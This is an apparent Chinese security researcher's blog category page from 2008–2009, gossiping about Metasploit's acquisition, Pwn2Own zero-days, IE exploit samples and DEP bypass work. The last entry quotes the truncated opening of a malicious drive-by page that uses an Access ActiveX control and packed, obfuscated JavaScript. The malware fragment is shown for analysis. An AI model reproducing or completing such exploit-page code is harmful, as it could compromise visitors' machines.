您正在查看 "技术八卦" 分类下的文章
2009-10-22 10:21
http://www.rapid7.com/news-events/press-releases/2009/2009-rapid7-acquire-metasploit.jsp
|
2009-03-23 23:15
http://blogs.zdnet.com/security/?p=2951
|
2009-03-19 11:19
神人啊,http://blogs.zdnet.com/security/?p=2934
update:
来瞻仰一下,http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits |
2009-03-16 17:08
2009-03-14 12:45
看到Twitter上几个大牛再说 JM的heap paper,期待公布后一阅。 |
2009-02-18 14:53
Trendmicro 抓到了针对MS09-002 ( ZDI-09-011)的攻击样本了,其实这个漏洞比之前那个data binding的更牛一点,虽然同样也只影响IE 7。但是关注的朋友不多啊,甚至SWI blog都没8一下? 真是奇怪啊! |
2008-10-26 14:06
XP SP3 dep要比XP SP2好解决,XP SP2本来打算放弃,谁知柳暗花明居然被我找到了一跳指令,果真应了船到桥头自然直啊。
顺便8卦一下Alexander Sotirov 居然就是Solar Eclipse,他以前写过不少linux exploit啊,比如以前在地下流传很久的openssl-too-open.c openldap-kbind-p00f.c等等,没记错的话他以前还是0dd的。牛人就是牛人啊,除了linux/windows,这厮还擅长XSS,看他在recon上讲的Blackbox Reversing Of XSS Filters就知道了,不过想到他的heap fengshui代码,还是可以看的出来他js的功底还是颇深的。 |
2008-10-24 22:39
2008-08-23 22:18
2008-07-15 10:09
看到pete大师在irc里面说的,尝试用ie打开了一下,VSE狂报警。
初步看是针对Access activeX下载执行和Flash 这两个漏洞的挂马。
ofc.htm:
<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c= |
|
| 
